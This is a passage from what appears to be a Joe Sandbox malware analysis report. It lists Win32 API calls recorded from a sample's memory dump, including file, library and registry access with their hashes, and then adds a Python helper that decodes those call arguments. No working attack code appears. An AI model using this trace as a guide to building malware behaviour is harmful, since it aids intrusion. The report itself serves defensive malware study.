                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                    • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                    • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                    • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                    APIs
                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                    • String ID:
                                                                    • API String ID: 2154303073-0
                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                    APIs
                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                    • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3154509469-0
                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                    APIs
                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                    • String ID:
                                                                    • API String ID: 4232544981-0
                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                    APIs
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FileModuleName
                                                                    • String ID:
                                                                    • API String ID: 3859505661-0
                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                    APIs
                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: EnumNamesResource
                                                                    • String ID:
                                                                    • API String ID: 3334572018-0
                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
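The `APIs` lines above show each call as the module-qualified API name followed by the raw 32-bit words found on the stack at the call site, with string pointers resolved inline and `?` where the sandbox could not recover a value. The first words line up with the stdcall parameters, so `CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,...)` is a file opened with GENERIC_WRITE, FILE_SHARE_READ and CREATE_ALWAYS, and `RegOpenKeyExW.KERNELBASE(80000002,...,00020019,...)` opens a key under HKEY_LOCAL_MACHINE with KEY_READ. The following Python helper is an added example for decoding such lines; it is not part of the Joe Sandbox report or of the Remcos/GuLoader sample. The sample inputs are the three call lines copied from this page. The positional mapping of stack words to parameters is an assumption that holds for these plain calls; the RegOpenKeyExW line itself shows the limit of it (the second slot, where a subkey pointer is expected, holds 80000002 while the subkey text appears later in the list), so the mapping should be checked against the disassembly whenever a slot looks out of place.

```python
"""Decode the raw argument words in Joe Sandbox 'APIs' lines into readable Win32 flags."""
import re
from typing import Dict, List, Optional

# Win32 constants, exact values from the Windows SDK headers.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_COMPOSITE = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
KEY_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
            0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
            0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x20000: "STANDARD_RIGHTS_READ"}

# Shape of a report line: "• Api.Module(word,word,...), ref: 0041XXXX"
LINE_RE = re.compile(r"^(?:•\s*)?(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")

# Sample input: three call lines copied verbatim from this report.
REPORT_LINES = [
    "• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,"
    "0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE",
    "• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,"
    "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5",
    "• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,"
    "0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5",
]


def parse_call(line: str) -> Dict[str, object]:
    """Split one report line into API name, module, stack words and call-site address."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    api, module, raw_args, ref = m.groups()
    words: List[object] = []
    for tok in raw_args.split(","):
        tok = tok.strip()
        if tok == "?":
            words.append(None)            # value not recovered by the sandbox
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            words.append(int(tok, 16))    # raw 32-bit stack word
        else:
            words.append(tok)             # string pointer shown resolved inline
    return {"api": api, "module": module, "words": words, "ref": int(ref, 16)}


def decode_mask(value: int, bits: Dict[int, str],
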